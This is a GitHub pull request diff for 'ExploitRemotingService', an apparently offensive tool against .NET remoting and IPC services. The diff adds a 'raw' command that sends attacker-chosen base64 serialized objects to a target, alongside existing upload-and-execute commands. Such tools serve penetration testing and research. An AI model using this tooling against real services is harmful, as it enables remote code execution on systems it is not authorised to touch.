Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add option to send raw serialized objects #4

Merged
merged 1 commit into from Mar 2, 2018
Merged

Add option to send raw serialized objects #4

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
39 changes: 32 additions & 7 deletions ExploitRemotingService/Program.cs
View file
Open in desktop
Expand Up @@ -234,6 +234,7 @@ static void PrintHelp(OptionSet p)
run file [args] : Upload and execute an assembly, calls entry point
user : Print the current username
ver : Print the OS version
raw base64_object : Send a raw serialized object to the service
");
}

Expand Down Expand Up @@ -677,9 +678,8 @@ private static IRemoteClass CreateRemoteClass()
}
}

static object SendRequest(object o, bool remote)
static object SendRequest(byte[] data)
{
byte[] data = SerializeObject(o, remote);
MemoryStream stm = new MemoryStream();
BinaryWriter writer = new BinaryWriter(stm);

Expand Down Expand Up @@ -712,7 +712,18 @@ static object SendRequest(object o, bool remote)

return ParseResult(reader);
}
}
}
}

static object SendRequest(string base64)
{
return SendRequest(Convert.FromBase64String(base64));
}

static object SendRequest(object o, bool remote)
{
byte[] data = SerializeObject(o, remote);
return SendRequest(data);
}

public static T MakeCall<T>(string path, MethodBase mi, params object[] cmdargs)
Expand Down Expand Up @@ -925,9 +936,23 @@ static int Main(string[] args)
Console.WriteLine("Detected version {0} server", _ver);
}

IRemoteClass ret = CreateRemoteClass();
if (_cmd.Equals("raw"))
{
if (_cmdargs.Count != 1)
{
Console.Error.WriteLine("Must specify base64 encoded object");
}
else
{
Console.WriteLine(SendRequest(_cmdargs.First<string>()));
}
}
else
{
IRemoteClass ret = CreateRemoteClass();

ExecuteCommand(ret);
ExecuteCommand(ret);
}
}
catch (Exception ex)
{
Expand All @@ -939,7 +964,7 @@ static int Main(string[] args)
else
{
return 1;
}
}
}
}
}
}
1 change: 1 addition & 0 deletions README.md
View file
Open in desktop
Expand Up @@ -44,6 +44,7 @@ ls remotedir : List a remote directory
run file [args] : Upload and execute an assembly, calls entry point
user : Print the current username
ver : Print the OS version
raw base64_object : Send a raw serialized object to the service
</pre>

This tool supports exploit both TCP remoting services and local IPC services. To test
Expand Down